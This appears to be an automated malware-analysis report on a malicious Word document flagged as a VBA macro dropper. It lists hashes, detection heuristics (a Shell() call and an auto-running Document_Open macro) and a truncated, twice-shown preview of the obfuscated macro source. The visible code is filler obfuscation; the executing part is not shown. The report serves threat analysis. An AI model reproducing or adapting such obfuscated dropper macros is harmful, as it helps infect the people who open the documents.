Office (OLE) malware analysis — malicious · 8585adf887b33559

MALICIOUS

Office (OLE)

156.9 KB Created: 2018-07-24 15:11:00 Authoring application: Microsoft Office Word First seen: 2019-01-25

MD5: 0a7d2564d6eff7738bb4143fd51834db SHA-1: fd5aae8486992e0791098eec29ad6bf417e75789 SHA-256: 8585adf887b3355954a53fe29033cb04ed03f746ba1d8c19d95597dffd609518

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, which is commonly used to execute arbitrary commands or download and run additional malware. The 'Document_Open' macro suggests automatic execution upon opening. The ClamAV detection 'Doc.Dropper.Agent-6859377-0' further confirms its malicious nature as a dropper.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6859377-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6859377-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28027 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	28027 bytes
SHA-256: `688d4426fb7b307528b6804482974be86f8a61e099182ad6b206650f31dee730`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "qtaRQFv" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function jAoIDBTwwiI() On Error Resume Next If VivhpY = 13 Then Set wBpCEz = KXzhI For BQZpU = 4776 To ZaUWPo riiPXO = zpBPn * rCDIOR * WmFFGN - zIbia - 25868 - HTfHb * 36861 * OLOJCZ Next Else If XWMIzu Eqv FcZJK Then VoNXp = Hex(djiXA) End If Set wFIarv = nDblP End If If TwIJa = 13 Then Set rHXuBU = kYSRX For GiMYC = 4776 To zYGhb rOVsSD = kWWRGo * pVwJC * UtfjG - GwbTla - 91410 - JFjrF * 28871 * mwkNFj Next Else If XdawiE Eqv zipls Then tIDkqL = Hex(wjlGDn) End If Set huuTAq = Zzsov End If If FWwWw = 13 Then Set Zwhqn = ILoKdi For NKwww = 4776 To kHTcA nMAXKD = vVXjj * OuhRM * iOjXw - azHOJ - 11328 - jBzjI * 76582 * GUnzqi Next Else If ijUCq Eqv LWaHo Then QjFAh = Hex(RLALO) End If Set YdiJJ = ihUorO End If If fDzqb = 13 Then Set CzLhB = EGGomN For TkXlbG = 4776 To vwCPP dfhDtn = LsuFv * wDSqs * DfcdHS - kPaFw - 92725 - WwYYC * 90242 * pcaqSp Next Else If JIcGK Eqv MzACZl Then CIlmz = Hex(dhziu) End If Set zcNDCm = dBaHzz End If If LWuGNR = 13 Then Set dvzWuz = nrUtrJ For DoWkBk = 4776 To KKwvU mNrAq = NDzuw * tRlGY * DhoIiY - MhNSl - 7049 - apIaAU * 5234 * vlDtZ Next Else If HTiElB Eqv mTiiSi Then nzkOrV = Hex(EILFEs) End If Set lCFpwq = NfOzC End If If GltwVt = 13 Then Set hPwNYR = SBzjz For njjAm = 4776 To OIsFE GlAXMD = ILnjjh * ZwuWr * FrFWEs - OiipK - 82749 - SfUup * 92619 * oOzAwT Next Else If hQNVO Eqv oOjdTU Then jdjwZs = Hex(Htizh) End If Set tQdFWH = wjORT End If If XjBfmc <> dtCAck Then KzmVwM = 63574 * HufmdH + 39684 * 20634 - Esmtpj * ICpCpw / fSbIwL / 17741 + 19264 - wabHzA * YJiMvj / hVRwNw + 44584 / GJFzTC Else Vzfuzq = ChrB(NYqIC) End If End Function Private Function YBDKLqb() On Error Resume Next If uwjnJ <> lqujkl Then TjdRw = CDate(65519 * QShHM) Else End If If ChNhwJ <> WIHYtU Then MUmwHC = CDate(89493 * VkmFOa) Else End If If nbPYa <> Scqdm Then ZnVLwR = CDate(55579 * oNUIYf) Else End If If zzukHj <> UrUMm Then SAtsIT = CDate(36277 * jqvUKj) Else End If If JzQwz <> PzYjz Then mPDwZ = CDate(67255 * pQHSCO) Else End If End Function Private Function TPYJjazJYGIATw() On Error Resume Next If LZYmzU <> GXbwQw Then Yjbmv = 71187 * FzqRf + 38912 * 78594 - loKZS * FTKjmT / uwnpc / 68428 + 69580 - FUnCa * ahVRA / mmmnq + 61628 / SNQDIR Else LCDbC = ChrB(EzfTWW) End If If qVDio <> DlBVL Then nuoCP = 32131 * WlZfw + 40383 * 37589 - wXmVVX * SwKQA / MUsrw / 88193 + 13690 - YsunqE * QqFNU / EOPzqv + 70117 / sszPOJ Else jnzbM = ChrB(ZiriiT) End If If DKzJK <> VifTj Then MOTfbP = 83464 * fLqHA + 56685 * 91941 - TMXJwO * KNMQC / PFwupQ / 1450 + 6972 - QOFqn * TrIhOc / TvZdw + 24635 / ROwoY Else GuMKM = ChrB(qNvJEI) End If If floRm <> RHKAz Then oRIoRf = 72690 * tXitO + 30494 * 1466 - GTQToX * bblWCk / sDcGv / 75338 + 78266 - CrlTcH * vCWNc / qjfIQ + 58174 / NfIjnp Else bRIUNA = ChrB(QYiVv) End If If cGjFO <> QHpLpf Then KCdbY = 52365 * jiPlQR + 54796 * 41331 - Otdow * htYjV / RTYkUC / 26890 + 6911 - YvXVYz * wpzVvz / RMqImV + 69981 / oFvSK Else AvOORi = ChrB(zFTZbr) End If If FECjR <> GdsIw Then UjAvX = 53789 * HjCFmI + 88894 * 59740 - XRLcEZ * nwjzBJ / vrcpW / 86466 + 57341 - KCZ ... (truncated)

SHA-256: 688d4426fb7b307528b6804482974be86f8a61e099182ad6b206650f31dee730

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "qtaRQFv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function jAoIDBTwwiI()
On Error Resume Next
   If VivhpY = 13 Then
      Set wBpCEz = KXzhI
      For BQZpU = 4776 To ZaUWPo
         riiPXO = zpBPn * rCDIOR * WmFFGN - zIbia - 25868 - HTfHb * 36861 * OLOJCZ
      Next
      Else
      If XWMIzu Eqv FcZJK Then
         VoNXp = Hex(djiXA)
      End If
      Set wFIarv = nDblP
   End If
   If TwIJa = 13 Then
      Set rHXuBU = kYSRX
      For GiMYC = 4776 To zYGhb
         rOVsSD = kWWRGo * pVwJC * UtfjG - GwbTla - 91410 - JFjrF * 28871 * mwkNFj
      Next
      Else
      If XdawiE Eqv zipls Then
         tIDkqL = Hex(wjlGDn)
      End If
      Set huuTAq = Zzsov
   End If
   If FWwWw = 13 Then
      Set Zwhqn = ILoKdi
      For NKwww = 4776 To kHTcA
         nMAXKD = vVXjj * OuhRM * iOjXw - azHOJ - 11328 - jBzjI * 76582 * GUnzqi
      Next
      Else
      If ijUCq Eqv LWaHo Then
         QjFAh = Hex(RLALO)
      End If
      Set YdiJJ = ihUorO
   End If
   If fDzqb = 13 Then
      Set CzLhB = EGGomN
      For TkXlbG = 4776 To vwCPP
         dfhDtn = LsuFv * wDSqs * DfcdHS - kPaFw - 92725 - WwYYC * 90242 * pcaqSp
      Next
      Else
      If JIcGK Eqv MzACZl Then
         CIlmz = Hex(dhziu)
      End If
      Set zcNDCm = dBaHzz
   End If
   If LWuGNR = 13 Then
      Set dvzWuz = nrUtrJ
      For DoWkBk = 4776 To KKwvU
         mNrAq = NDzuw * tRlGY * DhoIiY - MhNSl - 7049 - apIaAU * 5234 * vlDtZ
      Next
      Else
      If HTiElB Eqv mTiiSi Then
         nzkOrV = Hex(EILFEs)
      End If
      Set lCFpwq = NfOzC
   End If
   If GltwVt = 13 Then
      Set hPwNYR = SBzjz
      For njjAm = 4776 To OIsFE
         GlAXMD = ILnjjh * ZwuWr * FrFWEs - OiipK - 82749 - SfUup * 92619 * oOzAwT
      Next
      Else
      If hQNVO Eqv oOjdTU Then
         jdjwZs = Hex(Htizh)
      End If
      Set tQdFWH = wjORT
   End If
   If XjBfmc <> dtCAck Then
      KzmVwM = 63574 * HufmdH + 39684 * 20634 - Esmtpj * ICpCpw / fSbIwL / 17741 + 19264 - wabHzA * YJiMvj / hVRwNw + 44584 / GJFzTC
      Else
      Vzfuzq = ChrB(NYqIC)
   End If
End Function
Private Function YBDKLqb()
On Error Resume Next
   If uwjnJ <> lqujkl Then
      TjdRw = CDate(65519 * QShHM)
      Else
   End If
   If ChNhwJ <> WIHYtU Then
      MUmwHC = CDate(89493 * VkmFOa)
      Else
   End If
   If nbPYa <> Scqdm Then
      ZnVLwR = CDate(55579 * oNUIYf)
      Else
   End If
   If zzukHj <> UrUMm Then
      SAtsIT = CDate(36277 * jqvUKj)
      Else
   End If
   If JzQwz <> PzYjz Then
      mPDwZ = CDate(67255 * pQHSCO)
      Else
   End If
End Function
Private Function TPYJjazJYGIATw()
On Error Resume Next
   If LZYmzU <> GXbwQw Then
      Yjbmv = 71187 * FzqRf + 38912 * 78594 - loKZS * FTKjmT / uwnpc / 68428 + 69580 - FUnCa * ahVRA / mmmnq + 61628 / SNQDIR
      Else
      LCDbC = ChrB(EzfTWW)
   End If
   If qVDio <> DlBVL Then
      nuoCP = 32131 * WlZfw + 40383 * 37589 - wXmVVX * SwKQA / MUsrw / 88193 + 13690 - YsunqE * QqFNU / EOPzqv + 70117 / sszPOJ
      Else
      jnzbM = ChrB(ZiriiT)
   End If
   If DKzJK <> VifTj Then
      MOTfbP = 83464 * fLqHA + 56685 * 91941 - TMXJwO * KNMQC / PFwupQ / 1450 + 6972 - QOFqn * TrIhOc / TvZdw + 24635 / ROwoY
      Else
      GuMKM = ChrB(qNvJEI)
   End If
   If floRm <> RHKAz Then
      oRIoRf = 72690 * tXitO + 30494 * 1466 - GTQToX * bblWCk / sDcGv / 75338 + 78266 - CrlTcH * vCWNc / qjfIQ + 58174 / NfIjnp
      Else
      bRIUNA = ChrB(QYiVv)
   End If
   If cGjFO <> QHpLpf Then
      KCdbY = 52365 * jiPlQR + 54796 * 41331 - Otdow * htYjV / RTYkUC / 26890 + 6911 - YvXVYz * wpzVvz / RMqImV + 69981 / oFvSK
      Else
      AvOORi = ChrB(zFTZbr)
   End If
   If FECjR <> GdsIw Then
      UjAvX = 53789 * HjCFmI + 88894 * 59740 - XRLcEZ * nwjzBJ / vrcpW / 86466 + 57341 - KCZ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.